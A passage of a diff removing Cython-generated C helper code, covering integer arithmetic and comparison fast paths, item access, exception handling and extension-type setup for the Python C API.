- PyInt_FromLong((long)result) : PyLong_FromLongLong(result); - } -#endif -#if CYTHON_USE_TYPE_SLOTS - return PyInt_Type.tp_as_number->nb_multiply(op1, op2); -#else - return PyNumber_Multiply(op1, op2); -#endif - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op2))) { - const long a = intval; - long b, x; -#ifdef HAVE_LONG_LONG - const PY_LONG_LONG lla = intval; - PY_LONG_LONG llb, llx; -#endif - if (unlikely(__Pyx_PyLong_IsZero(op2))) { - return __Pyx_NewRef(op2); - } - if (likely(__Pyx_PyLong_IsCompact(op2))) { - b = __Pyx_PyLong_CompactValue(op2); - } else { - const digit* digits = __Pyx_PyLong_Digits(op2); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op2); - switch (size) { - case -2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT+30) { - b = -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT+30) { - llb = -(PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT+30) { - b = (long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 2 * PyLong_SHIFT+30) { - llb = (PY_LONG_LONG) (((((unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT+30) { - b = -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT+30) { - llb = -(PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << 
PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT+30) { - b = (long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 3 * PyLong_SHIFT+30) { - llb = (PY_LONG_LONG) (((((((unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case -4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT+30) { - b = -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT+30) { - llb = -(PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - case 4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT+30) { - b = (long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - #ifdef HAVE_LONG_LONG - } else if (8 * sizeof(PY_LONG_LONG) - 1 > 4 * PyLong_SHIFT+30) { - llb = (PY_LONG_LONG) (((((((((unsigned PY_LONG_LONG)digits[3]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[2]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[1]) << PyLong_SHIFT) | (unsigned PY_LONG_LONG)digits[0])); - goto long_long; - #endif - } - CYTHON_FALLTHROUGH; - default: return PyLong_Type.tp_as_number->nb_multiply(op1, op2); - } - } - CYTHON_UNUSED_VAR(a); - 
CYTHON_UNUSED_VAR(b); - #ifdef HAVE_LONG_LONG - llb = b; - goto long_long; - #else - return PyLong_Type.tp_as_number->nb_multiply(op1, op2); - #endif - return PyLong_FromLong(x); -#ifdef HAVE_LONG_LONG - long_long: - llx = lla * llb; - return PyLong_FromLongLong(llx); -#endif - - - } - #endif - if (PyFloat_CheckExact(op2)) { - const long a = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double b = __pyx_PyFloat_AsDouble(op2); -#else - double b = PyFloat_AS_DOUBLE(op2); -#endif - double result; - - PyFPE_START_PROTECT("multiply", return NULL) - result = ((double)a) * (double)b; - PyFPE_END_PROTECT(result) - return PyFloat_FromDouble(result); - } - return (inplace ? PyNumber_InPlaceMultiply : PyNumber_Multiply)(op1, op2); -} -#endif - -/* RaiseTooManyValuesToUnpack */ -static CYTHON_INLINE void __Pyx_RaiseTooManyValuesError(Py_ssize_t expected) { - PyErr_Format(PyExc_ValueError, - "too many values to unpack (expected %" CYTHON_FORMAT_SSIZE_T "d)", expected); -} - -/* RaiseNeedMoreValuesToUnpack */ -static CYTHON_INLINE void __Pyx_RaiseNeedMoreValuesError(Py_ssize_t index) { - PyErr_Format(PyExc_ValueError, - "need more than %" CYTHON_FORMAT_SSIZE_T "d value%.1s to unpack", - index, (index == 1) ? 
"" : "s"); -} - -/* IterFinish */ -static CYTHON_INLINE int __Pyx_IterFinish(void) { - __Pyx_PyThreadState_declare - __Pyx_PyThreadState_assign - PyObject* exc_type = __Pyx_PyErr_CurrentExceptionType(); - if (unlikely(exc_type)) { - if (unlikely(!__Pyx_PyErr_GivenExceptionMatches(exc_type, PyExc_StopIteration))) - return -1; - __Pyx_PyErr_Clear(); - return 0; - } - return 0; -} - -/* UnpackItemEndCheck */ -static int __Pyx_IternextUnpackEndCheck(PyObject *retval, Py_ssize_t expected) { - if (unlikely(retval)) { - Py_DECREF(retval); - __Pyx_RaiseTooManyValuesError(expected); - return -1; - } - return __Pyx_IterFinish(); -} - -/* PyIntBinop */ -#if !CYTHON_COMPILING_IN_PYPY -static PyObject* __Pyx_PyInt_TrueDivideObjC(PyObject *op1, PyObject *op2, long intval, int inplace, int zerodivision_check) { - CYTHON_MAYBE_UNUSED_VAR(intval); - CYTHON_MAYBE_UNUSED_VAR(inplace); - CYTHON_UNUSED_VAR(zerodivision_check); - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - const long b = intval; - long a = PyInt_AS_LONG(op1); - - if (8 * sizeof(long) <= 53 || likely(labs(a) <= ((PY_LONG_LONG)1 << 53))) { - return PyFloat_FromDouble((double)a / (double)b); - } - return PyInt_Type.tp_as_number->nb_true_divide(op1, op2); - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op1))) { - const long b = intval; - long a, x; - if (unlikely(__Pyx_PyLong_IsZero(op1))) { - } - if (likely(__Pyx_PyLong_IsCompact(op1))) { - a = __Pyx_PyLong_CompactValue(op1); - } else { - const digit* digits = __Pyx_PyLong_Digits(op1); - const Py_ssize_t size = __Pyx_PyLong_SignedDigitCount(op1); - switch (size) { - case -2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT && 1 * PyLong_SHIFT < 53) { - a = -(long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - case 2: - if (8 * sizeof(long) - 1 > 2 * PyLong_SHIFT && 1 * PyLong_SHIFT < 53) { - a = (long) (((((unsigned long)digits[1]) << PyLong_SHIFT) | 
(unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - case -3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT && 2 * PyLong_SHIFT < 53) { - a = -(long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - case 3: - if (8 * sizeof(long) - 1 > 3 * PyLong_SHIFT && 2 * PyLong_SHIFT < 53) { - a = (long) (((((((unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - case -4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT && 3 * PyLong_SHIFT < 53) { - a = -(long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - case 4: - if (8 * sizeof(long) - 1 > 4 * PyLong_SHIFT && 3 * PyLong_SHIFT < 53) { - a = (long) (((((((((unsigned long)digits[3]) << PyLong_SHIFT) | (unsigned long)digits[2]) << PyLong_SHIFT) | (unsigned long)digits[1]) << PyLong_SHIFT) | (unsigned long)digits[0])); - break; - } - CYTHON_FALLTHROUGH; - default: return PyLong_Type.tp_as_number->nb_true_divide(op1, op2); - } - } - if ((8 * sizeof(long) <= 53 || likely(labs(a) <= ((PY_LONG_LONG)1 << 53))) - || __Pyx_PyLong_DigitCount(op1) <= 52 / PyLong_SHIFT) { - return PyFloat_FromDouble((double)a / (double)b); - } - return PyLong_Type.tp_as_number->nb_true_divide(op1, op2); - return PyLong_FromLong(x); - - } - #endif - if (PyFloat_CheckExact(op1)) { - const long b = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double a = __pyx_PyFloat_AsDouble(op1); -#else - double a = PyFloat_AS_DOUBLE(op1); -#endif - double result; - - PyFPE_START_PROTECT("divide", return NULL) - result = ((double)a) / (double)b; - PyFPE_END_PROTECT(result) - return PyFloat_FromDouble(result); - } - return (inplace ? 
PyNumber_InPlaceTrueDivide : PyNumber_TrueDivide)(op1, op2); -} -#endif - -/* PyIntCompare */ -static CYTHON_INLINE int __Pyx_PyInt_BoolNeObjC(PyObject *op1, PyObject *op2, long intval, long inplace) { - CYTHON_MAYBE_UNUSED_VAR(intval); - CYTHON_UNUSED_VAR(inplace); - if (op1 == op2) { - return 0; - } - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - const long b = intval; - long a = PyInt_AS_LONG(op1); - return (a != b); - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op1))) { - int unequal; - unsigned long uintval; - Py_ssize_t size = __Pyx_PyLong_DigitCount(op1); - const digit* digits = __Pyx_PyLong_Digits(op1); - if (intval == 0) { - return (__Pyx_PyLong_IsZero(op1) != 1); - } else if (intval < 0) { - if (__Pyx_PyLong_IsNonNeg(op1)) - return 1; - intval = -intval; - } else { - if (__Pyx_PyLong_IsNeg(op1)) - return 1; - } - uintval = (unsigned long) intval; -#if PyLong_SHIFT * 4 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 4)) { - unequal = (size != 5) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[3] != ((uintval >> (3 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[4] != ((uintval >> (4 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 3 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 3)) { - unequal = (size != 4) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[3] != ((uintval >> (3 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 2 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 2)) { - unequal = (size != 3) || (digits[0] != (uintval & (unsigned long) 
PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 1 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 1)) { - unequal = (size != 2) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif - unequal = (size != 1) || (((unsigned long) digits[0]) != (uintval & (unsigned long) PyLong_MASK)); - return (unequal != 0); - } - #endif - if (PyFloat_CheckExact(op1)) { - const long b = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double a = __pyx_PyFloat_AsDouble(op1); -#else - double a = PyFloat_AS_DOUBLE(op1); -#endif - return ((double)a != (double)b); - } - return __Pyx_PyObject_IsTrueAndDecref( - PyObject_RichCompare(op1, op2, Py_NE)); -} - -/* GetItemInt */ -static PyObject *__Pyx_GetItemInt_Generic(PyObject *o, PyObject* j) { - PyObject *r; - if (unlikely(!j)) return NULL; - r = PyObject_GetItem(o, j); - Py_DECREF(j); - return r; -} -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_List_Fast(PyObject *o, Py_ssize_t i, - CYTHON_NCP_UNUSED int wraparound, - CYTHON_NCP_UNUSED int boundscheck) { -#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - Py_ssize_t wrapped_i = i; - if (wraparound & unlikely(i < 0)) { - wrapped_i += PyList_GET_SIZE(o); - } - if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyList_GET_SIZE(o)))) { - PyObject *r = PyList_GET_ITEM(o, wrapped_i); - Py_INCREF(r); - return r; - } - return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); -#else - return PySequence_GetItem(o, i); -#endif -} -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Tuple_Fast(PyObject *o, Py_ssize_t i, - CYTHON_NCP_UNUSED int wraparound, - CYTHON_NCP_UNUSED int boundscheck) { -#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS - Py_ssize_t wrapped_i = i; - if (wraparound & unlikely(i < 
0)) { - wrapped_i += PyTuple_GET_SIZE(o); - } - if ((!boundscheck) || likely(__Pyx_is_valid_index(wrapped_i, PyTuple_GET_SIZE(o)))) { - PyObject *r = PyTuple_GET_ITEM(o, wrapped_i); - Py_INCREF(r); - return r; - } - return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); -#else - return PySequence_GetItem(o, i); -#endif -} -static CYTHON_INLINE PyObject *__Pyx_GetItemInt_Fast(PyObject *o, Py_ssize_t i, int is_list, - CYTHON_NCP_UNUSED int wraparound, - CYTHON_NCP_UNUSED int boundscheck) { -#if CYTHON_ASSUME_SAFE_MACROS && !CYTHON_AVOID_BORROWED_REFS && CYTHON_USE_TYPE_SLOTS - if (is_list || PyList_CheckExact(o)) { - Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyList_GET_SIZE(o); - if ((!boundscheck) || (likely(__Pyx_is_valid_index(n, PyList_GET_SIZE(o))))) { - PyObject *r = PyList_GET_ITEM(o, n); - Py_INCREF(r); - return r; - } - } - else if (PyTuple_CheckExact(o)) { - Py_ssize_t n = ((!wraparound) | likely(i >= 0)) ? i : i + PyTuple_GET_SIZE(o); - if ((!boundscheck) || likely(__Pyx_is_valid_index(n, PyTuple_GET_SIZE(o)))) { - PyObject *r = PyTuple_GET_ITEM(o, n); - Py_INCREF(r); - return r; - } - } else { - PyMappingMethods *mm = Py_TYPE(o)->tp_as_mapping; - PySequenceMethods *sm = Py_TYPE(o)->tp_as_sequence; - if (mm && mm->mp_subscript) { - PyObject *r, *key = PyInt_FromSsize_t(i); - if (unlikely(!key)) return NULL; - r = mm->mp_subscript(o, key); - Py_DECREF(key); - return r; - } - if (likely(sm && sm->sq_item)) { - if (wraparound && unlikely(i < 0) && likely(sm->sq_length)) { - Py_ssize_t l = sm->sq_length(o); - if (likely(l >= 0)) { - i += l; - } else { - if (!PyErr_ExceptionMatches(PyExc_OverflowError)) - return NULL; - PyErr_Clear(); - } - } - return sm->sq_item(o, i); - } - } -#else - if (is_list || PySequence_Check(o)) { - return PySequence_GetItem(o, i); - } -#endif - return __Pyx_GetItemInt_Generic(o, PyInt_FromSsize_t(i)); -} - -/* PyObjectCallOneArg */ -static CYTHON_INLINE PyObject* __Pyx_PyObject_CallOneArg(PyObject *func, PyObject 
*arg) { - PyObject *args[2] = {NULL, arg}; - return __Pyx_PyObject_FastCall(func, args+1, 1 | __Pyx_PY_VECTORCALL_ARGUMENTS_OFFSET); -} - -/* ObjectGetItem */ -#if CYTHON_USE_TYPE_SLOTS -static PyObject *__Pyx_PyObject_GetIndex(PyObject *obj, PyObject *index) { - PyObject *runerr = NULL; - Py_ssize_t key_value; - key_value = __Pyx_PyIndex_AsSsize_t(index); - if (likely(key_value != -1 || !(runerr = PyErr_Occurred()))) { - return __Pyx_GetItemInt_Fast(obj, key_value, 0, 1, 1); - } - if (PyErr_GivenExceptionMatches(runerr, PyExc_OverflowError)) { - __Pyx_TypeName index_type_name = __Pyx_PyType_GetName(Py_TYPE(index)); - PyErr_Clear(); - PyErr_Format(PyExc_IndexError, - "cannot fit '" __Pyx_FMT_TYPENAME "' into an index-sized integer", index_type_name); - __Pyx_DECREF_TypeName(index_type_name); - } - return NULL; -} -static PyObject *__Pyx_PyObject_GetItem_Slow(PyObject *obj, PyObject *key) { - __Pyx_TypeName obj_type_name; - if (likely(PyType_Check(obj))) { - PyObject *meth = __Pyx_PyObject_GetAttrStrNoError(obj, __pyx_n_s_class_getitem); - if (meth) { - PyObject *result = __Pyx_PyObject_CallOneArg(meth, key); - Py_DECREF(meth); - return result; - } - } - obj_type_name = __Pyx_PyType_GetName(Py_TYPE(obj)); - PyErr_Format(PyExc_TypeError, - "'" __Pyx_FMT_TYPENAME "' object is not subscriptable", obj_type_name); - __Pyx_DECREF_TypeName(obj_type_name); - return NULL; -} -static PyObject *__Pyx_PyObject_GetItem(PyObject *obj, PyObject *key) { - PyTypeObject *tp = Py_TYPE(obj); - PyMappingMethods *mm = tp->tp_as_mapping; - PySequenceMethods *sm = tp->tp_as_sequence; - if (likely(mm && mm->mp_subscript)) { - return mm->mp_subscript(obj, key); - } - if (likely(sm && sm->sq_item)) { - return __Pyx_PyObject_GetIndex(obj, key); - } - return __Pyx_PyObject_GetItem_Slow(obj, key); -} -#endif - -/* PyIntCompare */ -static CYTHON_INLINE int __Pyx_PyInt_BoolEqObjC(PyObject *op1, PyObject *op2, long intval, long inplace) { - CYTHON_MAYBE_UNUSED_VAR(intval); - 
CYTHON_UNUSED_VAR(inplace); - if (op1 == op2) { - return 1; - } - #if PY_MAJOR_VERSION < 3 - if (likely(PyInt_CheckExact(op1))) { - const long b = intval; - long a = PyInt_AS_LONG(op1); - return (a == b); - } - #endif - #if CYTHON_USE_PYLONG_INTERNALS - if (likely(PyLong_CheckExact(op1))) { - int unequal; - unsigned long uintval; - Py_ssize_t size = __Pyx_PyLong_DigitCount(op1); - const digit* digits = __Pyx_PyLong_Digits(op1); - if (intval == 0) { - return (__Pyx_PyLong_IsZero(op1) == 1); - } else if (intval < 0) { - if (__Pyx_PyLong_IsNonNeg(op1)) - return 0; - intval = -intval; - } else { - if (__Pyx_PyLong_IsNeg(op1)) - return 0; - } - uintval = (unsigned long) intval; -#if PyLong_SHIFT * 4 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 4)) { - unequal = (size != 5) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[3] != ((uintval >> (3 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[4] != ((uintval >> (4 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 3 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 3)) { - unequal = (size != 4) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[3] != ((uintval >> (3 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 2 < SIZEOF_LONG*8 - if (uintval >> (PyLong_SHIFT * 2)) { - unequal = (size != 3) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)) | (digits[2] != ((uintval >> (2 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif -#if PyLong_SHIFT * 1 < SIZEOF_LONG*8 - if (uintval 
>> (PyLong_SHIFT * 1)) { - unequal = (size != 2) || (digits[0] != (uintval & (unsigned long) PyLong_MASK)) - | (digits[1] != ((uintval >> (1 * PyLong_SHIFT)) & (unsigned long) PyLong_MASK)); - } else -#endif - unequal = (size != 1) || (((unsigned long) digits[0]) != (uintval & (unsigned long) PyLong_MASK)); - return (unequal == 0); - } - #endif - if (PyFloat_CheckExact(op1)) { - const long b = intval; -#if CYTHON_COMPILING_IN_LIMITED_API - double a = __pyx_PyFloat_AsDouble(op1); -#else - double a = PyFloat_AS_DOUBLE(op1); -#endif - return ((double)a == (double)b); - } - return __Pyx_PyObject_IsTrueAndDecref( - PyObject_RichCompare(op1, op2, Py_EQ)); -} - -/* RaiseUnboundLocalError */ -static CYTHON_INLINE void __Pyx_RaiseUnboundLocalError(const char *varname) { - PyErr_Format(PyExc_UnboundLocalError, "local variable '%s' referenced before assignment", varname); -} - -/* GetException */ -#if CYTHON_FAST_THREAD_STATE -static int __Pyx__GetException(PyThreadState *tstate, PyObject **type, PyObject **value, PyObject **tb) -#else -static int __Pyx_GetException(PyObject **type, PyObject **value, PyObject **tb) -#endif -{ - PyObject *local_type = NULL, *local_value, *local_tb = NULL; -#if CYTHON_FAST_THREAD_STATE - PyObject *tmp_type, *tmp_value, *tmp_tb; - #if PY_VERSION_HEX >= 0x030C00A6 - local_value = tstate->current_exception; - tstate->current_exception = 0; - if (likely(local_value)) { - local_type = (PyObject*) Py_TYPE(local_value); - Py_INCREF(local_type); - local_tb = PyException_GetTraceback(local_value); - } - #else - local_type = tstate->curexc_type; - local_value = tstate->curexc_value; - local_tb = tstate->curexc_traceback; - tstate->curexc_type = 0; - tstate->curexc_value = 0; - tstate->curexc_traceback = 0; - #endif -#else - PyErr_Fetch(&local_type, &local_value, &local_tb); -#endif - PyErr_NormalizeException(&local_type, &local_value, &local_tb); -#if CYTHON_FAST_THREAD_STATE && PY_VERSION_HEX >= 0x030C00A6 - if (unlikely(tstate->current_exception)) 
-#elif CYTHON_FAST_THREAD_STATE - if (unlikely(tstate->curexc_type)) -#else - if (unlikely(PyErr_Occurred())) -#endif - goto bad; - #if PY_MAJOR_VERSION >= 3 - if (local_tb) { - if (unlikely(PyException_SetTraceback(local_value, local_tb) < 0)) - goto bad; - } - #endif - Py_XINCREF(local_tb); - Py_XINCREF(local_type); - Py_XINCREF(local_value); - *type = local_type; - *value = local_value; - *tb = local_tb; -#if CYTHON_FAST_THREAD_STATE - #if CYTHON_USE_EXC_INFO_STACK - { - _PyErr_StackItem *exc_info = tstate->exc_info; - #if PY_VERSION_HEX >= 0x030B00a4 - tmp_value = exc_info->exc_value; - exc_info->exc_value = local_value; - tmp_type = NULL; - tmp_tb = NULL; - Py_XDECREF(local_type); - Py_XDECREF(local_tb); - #else - tmp_type = exc_info->exc_type; - tmp_value = exc_info->exc_value; - tmp_tb = exc_info->exc_traceback; - exc_info->exc_type = local_type; - exc_info->exc_value = local_value; - exc_info->exc_traceback = local_tb; - #endif - } - #else - tmp_type = tstate->exc_type; - tmp_value = tstate->exc_value; - tmp_tb = tstate->exc_traceback; - tstate->exc_type = local_type; - tstate->exc_value = local_value; - tstate->exc_traceback = local_tb; - #endif - Py_XDECREF(tmp_type); - Py_XDECREF(tmp_value); - Py_XDECREF(tmp_tb); -#else - PyErr_SetExcInfo(local_type, local_value, local_tb); -#endif - return 0; -bad: - *type = 0; - *value = 0; - *tb = 0; - Py_XDECREF(local_type); - Py_XDECREF(local_value); - Py_XDECREF(local_tb); - return -1; -} - -/* pep479 */ -static void __Pyx_Generator_Replace_StopIteration(int in_async_gen) { - PyObject *exc, *val, *tb, *cur_exc; - __Pyx_PyThreadState_declare - #ifdef __Pyx_StopAsyncIteration_USED - int is_async_stopiteration = 0; - #endif - CYTHON_MAYBE_UNUSED_VAR(in_async_gen); - cur_exc = PyErr_Occurred(); - if (likely(!__Pyx_PyErr_GivenExceptionMatches(cur_exc, PyExc_StopIteration))) { - #ifdef __Pyx_StopAsyncIteration_USED - if (in_async_gen && unlikely(__Pyx_PyErr_GivenExceptionMatches(cur_exc, __Pyx_PyExc_StopAsyncIteration))) 
{ - is_async_stopiteration = 1; - } else - #endif - return; - } - __Pyx_PyThreadState_assign - __Pyx_GetException(&exc, &val, &tb); - Py_XDECREF(exc); - Py_XDECREF(val); - Py_XDECREF(tb); - PyErr_SetString(PyExc_RuntimeError, - #ifdef __Pyx_StopAsyncIteration_USED - is_async_stopiteration ? "async generator raised StopAsyncIteration" : - in_async_gen ? "async generator raised StopIteration" : - #endif - "generator raised StopIteration"); -} - -/* FixUpExtensionType */ -#if CYTHON_USE_TYPE_SPECS -static int __Pyx_fix_up_extension_type_from_spec(PyType_Spec *spec, PyTypeObject *type) { -#if PY_VERSION_HEX > 0x030900B1 || CYTHON_COMPILING_IN_LIMITED_API - CYTHON_UNUSED_VAR(spec); - CYTHON_UNUSED_VAR(type); -#else - const PyType_Slot *slot = spec->slots; - while (slot && slot->slot && slot->slot != Py_tp_members) - slot++; - if (slot && slot->slot == Py_tp_members) { - int changed = 0; -#if !(PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON) - const -#endif - PyMemberDef *memb = (PyMemberDef*) slot->pfunc; - while (memb && memb->name) { - if (memb->name[0] == '_' && memb->name[1] == '_') { -#if PY_VERSION_HEX < 0x030900b1 - if (strcmp(memb->name, "__weaklistoffset__") == 0) { - assert(memb->type == T_PYSSIZET); - assert(memb->flags == READONLY); - type->tp_weaklistoffset = memb->offset; - changed = 1; - } - else if (strcmp(memb->name, "__dictoffset__") == 0) { - assert(memb->type == T_PYSSIZET); - assert(memb->flags == READONLY); - type->tp_dictoffset = memb->offset; - changed = 1; - } -#if CYTHON_METH_FASTCALL - else if (strcmp(memb->name, "__vectorcalloffset__") == 0) { - assert(memb->type == T_PYSSIZET); - assert(memb->flags == READONLY); -#if PY_VERSION_HEX >= 0x030800b4 - type->tp_vectorcall_offset = memb->offset; -#else - type->tp_print = (printfunc) memb->offset; -#endif - changed = 1; - } -#endif -#else - if ((0)); -#endif -#if PY_VERSION_HEX <= 0x030900b1 && CYTHON_COMPILING_IN_CPYTHON - else if (strcmp(memb->name, "__module__") == 0) { - PyObject 
*descr; - assert(memb->type == T_OBJECT); - assert(memb->flags == 0 || memb->flags == READONLY); - descr = PyDescr_NewMember(type, memb); - if (unlikely(!descr)) - return -1; - if (unlikely(PyDict_SetItem(type->tp_dict, PyDescr_NAME(descr), descr) < 0)) { - Py_DECREF(descr); - return -1; - } - Py_DECREF(descr); - changed = 1; - } -#endif - } - memb++; - } - if (changed) - PyType_Modified(type); - } -#endif - return 0; -} -#endif - -/* FetchSharedCythonModule */ -static PyObject *__Pyx_FetchSharedCythonABIModule(void) { - PyObject *abi_module = PyImport_AddModule((char*) __PYX_ABI_MODULE_NAME); - if (unlikely(!abi_module)) return NULL; - Py_INCREF(abi_module); - return abi_module; -} - -/* FetchCommonType */ -static int __Pyx_VerifyCachedType(PyObject *cached_type, - const char *name, - Py_ssize_t basicsize, - Py_ssize_t expected_basicsize) { - if (!PyType_Check(cached_type)) { - PyErr_Format(PyExc_TypeError, - "Shared Cython type %.200s is not a type object", name); - return -1; - } - if (basicsize != expected_basicsize) { - PyErr_Format(PyExc_TypeError, - "Shared Cython type %.200s has the wrong size, try recompiling", - name); - return -1; - } - return 0; -} -#if !CYTHON_USE_TYPE_SPECS -static PyTypeObject* __Pyx_FetchCommonType(PyTypeObject* type) { - PyObject* abi_module; - const char* object_name; - PyTypeObject *cached_type = NULL; - abi_module = __Pyx_FetchSharedCythonABIModule(); - if (!abi_module) return NULL; - object_name = strrchr(type->tp_name, '.'); - object_name = object_name ? 
